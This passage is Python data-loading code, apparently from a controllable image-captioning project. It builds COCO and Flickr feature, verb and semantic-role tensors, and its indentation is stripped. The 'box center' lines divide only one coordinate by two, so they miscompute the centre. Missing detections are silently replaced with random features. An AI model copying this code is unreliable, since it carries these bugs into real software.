det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_class[str(id_image)][caption]
classes_seq = []
loc_2_verb = {}
loc_2_sr = {}
loc = 0
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
classes_seq.append(class_idx)
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(sr)
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0 means "no verb"
cls_seq = [self.classes[class_idx] for class_idx in classes_seq]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class indices start at 1; 0 presumably means background
width, height = self.img_shapes[str(id_image)]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # keep only the first fix_length entries
idx_list_ = np.array(cls_seq).argsort()
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
cls_seq.sort() # sort classes alphabetically, effectively shuffling the original order
for j, cls in enumerate(cls_seq):
cls_w = cls.split(',')[0].split(' ')[-1] # current class; why is it processed this way?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # indices of detections whose class matches the selected class
det_ids = np.unique(seed_detections)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # features of all regions of the current class
det_sequences_visual[j] = det_features[det_ids[0]] # feature of the first region of the current class
bbox = det_boxes[det_ids[0]] # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # box center, x
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # box center, y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # box width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # box height
for k, sr in enumerate(loc_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
det_sequences_verb[j, k] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][k]] + 1 # 0 denotes padding
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), idx_list
class COCOControlSetField_Verb(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_classes_path=None, cap_verb_path=None,
verb_idx_path=None, detections_path=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, vocab_path=None, idx_2_verb_og_path=None, verb_vob_path=None,
fix_length=20, max_detections=20, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(cap_classes_path, 'r') as fp:
self.cap_2_classes = json.load(fp)
with open(idx_vs_path, 'r') as fp:
self.idx_2_vs = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(cap_verb_path, 'r') as fp:
self.cap_2_verb = json.load(fp)
with open(vocab_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
with open(idx_2_verb_og_path) as f:
self.idx_2_v_og = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(COCOControlSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[str(id_image)][caption]['verb']
idx_2_sr = self.idx_2_vs[str(id_image)][caption]['sr']
idx_2_v_og = self.idx_2_v_og[str(id_image)][caption]
cap_2_verb = self.cap_2_verb[str(id_image)][caption]
cls_seq = self.cap_2_classes[str(id_image)][caption]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class从1开始,0可能表示没有关系
width, height = self.img_shapes[str(id_image)]
# pooled_feat
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
# non-verb positions are 0; verb positions hold the verb index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
verb_list_og = np.zeros((self.fix_length, 1))
verb_list_og[verb_list_og==0] = -1
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0 means "no verb"
cls_seq = cls_seq[:self.fix_length] # keep only the first fix_length entries
for j, cls in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if k >= 8:
continue
gt_det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
gt_det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[j][k]] + 1 # 0 denotes padding
# shuffle the class order randomly
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if cls == '_':
continue
if cls != 'verb': # entries whose class is 'verb' skip the detection-feature lookup
cls_w = cls.split(',')[0].split(' ')[-1] # current class; why is it processed this way?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # indices of detections whose class matches the selected class
det_ids = np.unique(seed_detections)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # features of all regions of the current class
det_sequences_visual[j] = det_features[det_ids[0]] # feature of the first region of the current class
bbox = det_boxes[det_ids[0]] # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # box center, x
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # box center, y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # box width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # box height
else:
det_sequences_visual_all[j, 0] = pooled_feat
# what follows resolves this slot's verb index
if idx_2_verb[int(idx_list[j][0])] != []:
if idx_2_v_og[int(idx_list[j][0])][0] in self.vocab_2_idx:
verb_list_og[j, :] = self.vocab_2_idx[idx_2_v_og[int(idx_list[j][0])][0]]
else:
verb_list_og[j, :] = 0
verb_list[j, :] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][0]] + 1
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][k]] + 1 # 0 denotes padding
if self.gt_verb:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
class COCODetSetField_Verb(RawField):
def __init__(self, postprocessing=None, cls_seq_path=None, vocab_path=None,
vlem_2_v_og_path=None, verb_idx_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, fix_length=20, max_detections=20,
gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(vocab_path, 'r') as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
# match verb_idx to vocab_idx
with open(vlem_2_v_og_path) as f:
self.vlem_2_verb = json.load(f)
with open(cls_seq_path) as f:
self.img_cap_v_2_class = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is used to predict the END of the output
super(COCODetSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x, rand=True):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
# get the det region info.
v_2_class = self.img_cap_v_2_class[str(id_image)][caption]
classes_seq = []
loc_2_verb = {}
loc_2_sr = {}
loc = 0
cap_2_verb = []
vlem_2_verb = self.vlem_2_verb[str(id_image)][caption]
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
classes_seq.append(class_idx) # the class idx (one of the 1600 detector classes)
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0 means "no verb"
# append the cls_seq with "verb" in the beginning
cls_seq = []
for verb in cap_2_verb:
cls_seq.append('verb')
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append('V')
loc += 1
cls_seq += [self.classes[class_idx] for class_idx in classes_seq]
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(sr)
loc += 1
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class indices start at 1; 0 presumably means background
width, height = self.img_shapes[str(id_image)]
# pooled_feat
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # keep only the first fix_length entries
# non-verb positions are 0; verb positions hold the verb index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
# shuffle the class order randomly
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if cls != 'verb':
cls_w = cls.split(',')[0].split(' ')[-1] # current class; why is it processed this way?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # indices of detections whose class matches the selected class
if seed_detections != []:
det_ids = np.unique(seed_detections)
else:
det_ids = np.array([]).astype(np.int64)
if len(det_ids) == 0:
det_ids = [1]
print(caption)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # features of all regions of the current class
det_sequences_visual[j] = det_features[det_ids[0]] # feature of the first region of the current class
bbox = det_boxes[det_ids[0]] # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # box center, x
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # box center, y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # box width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # box height
else:
det_sequences_visual_all[j, 0] = pooled_feat
# what follows resolves this slot's verb index
if loc_2_verb[int(idx_list[j][0])] != []:
if self.gt_verb is False:
verb_list[j, :] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][0]] + 1
else:
for v_lem, verb_og in vlem_2_verb:
if v_lem == loc_2_verb[int(idx_list[j][0])][0]:
if verb_og in self.vocab_2_idx:
verb_list[j, :] = self.vocab_2_idx[verb_og]
else:
verb_list[j, :] = 0
break
for k, sr in enumerate(loc_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
det_sequences_verb[j, k] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][k]] + 1 # 0 denotes padding
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), \
control_verb.astype(np.float32), idx_list, verb_list
# Flickr
class FlickrDetectionField(RawField):
def __init__(self, preprocessing=None, postprocessing=None, detections_path=None, diverse=False):
self.max_detections = 100
self.detections_path = detections_path
self.diverse = diverse
super(FlickrDetectionField, self).__init__(preprocessing, postprocessing)
def preprocess(self, x, avoid_precomp=False):
image_id = int(x.split('/')[-1].split('.')[0])
try:
precomp_data = h5py.File(self.detections_path, 'r')['%d_features' % image_id][()]
except KeyError:
warnings.warn('Could not find detections for %d' % image_id)
precomp_data = np.random.rand(10, 2048)
delta = self.max_detections - precomp_data.shape[0]
if delta > 0:
precomp_data = np.concatenate([precomp_data, np.zeros((delta, precomp_data.shape[1]))], axis=0)
elif delta < 0:
precomp_data = precomp_data[:self.max_detections]
if self.diverse:
return precomp_data.astype(np.float32), image_id
return precomp_data.astype(np.float32)
# Flickr detection field
class FlickrControlSetField(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_verb_path=None, cap_classes_path=None,
verb_idx_path=None, detections_path=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, fix_length=20, max_detections=20, visual=True):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(idx_vs_path) as f:
self.idx_2_vs = json.load(f)
with open(cap_verb_path) as f:
self.cap_2_verb = json.load(f)
with open(cap_classes_path) as f:
self.cap_2_classes = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrControlSetField, self).__init__(None, postprocessing)
@staticmethod
def _bb_intersection_over_union(boxA, boxB):
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / (boxAArea + boxBArea - interArea)
return iou
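# Worked example (a sketch): for boxA = [0, 0, 10, 10] and boxB = [5, 5, 15, 15]
# the intersection is (10-5+1) * (10-5+1) = 36 (the +1 treats coordinates as
# inclusive pixel indices), each box area is 11 * 11 = 121, so
# iou = 36 / (121 + 121 - 36) ~= 0.175.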
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
if self.visual:
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %s' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[id_image][caption]['verb'] # verb&num
idx_2_sr = self.idx_2_vs[id_image][caption]['sr'] # sr_idx
cap_2_verb = self.cap_2_verb[id_image][caption] # verb
cls_seq = self.cap_2_classes[id_image][caption]
cls_seq = [x-1 for x in cls_seq] # shift indices down by 1; verb markers go from -1 to -2
if self.visual:
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 \
+ 10000 * int(verb.split('_')[-1]) # 0 means "no verb"
# non-verb positions are 0; verb positions hold the verb index
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # keep only the first fix_length entries
for j, cls_ in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if idx_2_verb[j][k] in cap_2_verb:
gt_det_sequences_sr[j, k] = sr # 0 denotes padding
gt_det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[j][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[j][k].split('_')[-1]) # 0 means "no verb"
# shuffle the class order randomly
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if self.visual:
id_boxes = []
for k, bbox in enumerate(gt_bboxes[cls]):
id_bbox = -1
iou_max = 0
for ii, det_bbox in enumerate(det_bboxes):
iou = self._bb_intersection_over_union(bbox, det_bbox)
if iou_max < iou:
id_bbox = ii
iou_max = iou
id_boxes.append(id_bbox)
id_boxes.sort()
cls_w = selected_classes[id_boxes[0]].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
det_sequences_visual_all[j, :len(id_boxes)] = np.take(det_features, id_boxes, axis=0)[:self.max_detections]
det_sequences_visual[j] = det_features[id_boxes[0]]
bbox = det_bboxes[id_boxes[0]]
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if idx_2_verb[int(idx_list[j][0])][k] in cap_2_verb:
det_sequences_sr[j, k] = sr
det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[int(idx_list[j][0])][k].split('_')[-1])
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
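# A sketch of the packed verb id used above: a token like 'run_2' stores its
# lemma index and occurrence number in one integer. Assuming, say,
# flickr_verb_idx['run'] == 41, the id is 41 + 1 + 10000 * 2 == 20042; the +1
# keeps 0 free to mean "no verb", and the 10000 factor separates occurrences.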
class FlickrDetSetField(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, verb_vob_path=None, idbox_seq_path=None,
detections_path=None, classes_path=None, img_shapes_path=None, precomp_glove_path=None,
fix_length=20, max_detections=20, visual=True):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
with open(idbox_seq_path) as f:
self.img_cap_v_2_idbox = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrDetSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
det_classes = x[2]
id_image = image.split('/')[-1].split('.')[0]
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %s' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_idbox[id_image][caption]
loc_2_verb = {}
loc_2_sr = {}
loc = 0
idbox_seq = {}
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
if id_box not in idbox_seq:
idbox_seq[id_box] = loc
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 # 0 means "no verb"
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
loc_ = idbox_seq[id_box]
loc_2_verb.setdefault(loc_, []).append(verb)
loc_2_sr.setdefault(loc_, []).append(sr)
width, height = self.img_shapes[str(id_image)]
# visual feature
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
for j, idbox in enumerate(idbox_seq):
if j == 10: break
det_sequences_visual_all[j, 0] = det_features[idbox] # features of all regions of the current class
det_sequences_visual[j] = det_features[idbox] # feature of the first region of the current class
cls_w = selected_classes[idbox].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
bbox = det_bboxes[idbox] # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # box center, x
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # box center, y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # box width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # box height
for k, sr in enumerate(loc_2_sr[j]):
if k >= 8:
continue
det_sequences_sr[j, k] = sr # 0 denotes padding
det_sequences_verb[j, k] = self.flickr_verb_idx[loc_2_verb[j][k].split('_')[0]] + 1 # 0 denotes padding
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32)
class FlickrControlSetField_Verb(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_verb_path=None, cap_classes_path=None,
verb_idx_path=None, idx_v_og_path=None, vocab_list_path=None, detections_path=None,
classes_path=None, img_shapes_path=None, precomp_glove_path=None, fix_length=20,
max_detections=20, visual=True, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for line in f.readlines():
self.classes.append(line.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(idx_vs_path) as f:
self.idx_2_vs = json.load(f)
with open(cap_verb_path) as f:
self.cap_2_verb = json.load(f)
with open(cap_classes_path) as f:
self.cap_2_classes = json.load(f)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(idx_v_og_path) as f:
self.idx_2_v_og = json.load(f)
with open(vocab_list_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
